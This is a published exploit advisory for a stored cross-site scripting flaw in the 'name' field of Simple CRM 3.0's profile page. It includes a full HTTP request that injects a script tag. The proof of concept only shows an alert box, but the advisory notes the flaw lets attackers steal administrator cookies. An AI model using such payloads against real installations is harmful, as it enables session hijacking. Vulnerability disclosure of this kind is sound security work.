Share
## https://sploitus.com/exploit?id=PACKETSTORM:163221
# Exploit Title: Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)  
# Date: 20/06/2021  
# Exploit Author: Riadh Benlamine (rbn0x00)  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/small-crm-php/  
# Version: 3.0  
# Category: Webapps  
# Tested on: Apache2+MariaDB latest version  
# Description : Simple CRM suffers from Cross-site scripting, allowing authenticated attackers to obtain administrator cookies.  
  
Vunlerable page: /crm/profile.php  
  
POC:  
----  
POST /crm/profile.php HTTP/1.1  
Host: localhost  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data;  
boundary=---------------------------386571683933745493952831205283  
Content-Length: 779  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/crm/profile.php  
Cookie: PHPSESSID=l0iqlrmehhcasinv0ip09e3ls1  
Upgrade-Insecure-Requests: 1  
  
-----------------------------386571683933745493952831205283  
Content-Disposition: form-data; name="name"  
<script>alert('xss')</script>  
-----------------------------386571683933745493952831205283  
  
Content-Disposition: form-data; name="alt_email"  
  
-----------------------------386571683933745493952831205283  
  
Content-Disposition: form-data; name="phone"  
0123456789  
  
-----------------------------386571683933745493952831205283  
  
Content-Disposition: form-data; name="gender"  
m  
  
-----------------------------386571683933745493952831205283  
  
Content-Disposition: form-data; name="address"  
  
-----------------------------386571683933745493952831205283  
  
Content-Disposition: form-data; name="update"  
Update  
  
-----------------------------386571683933745493952831205283--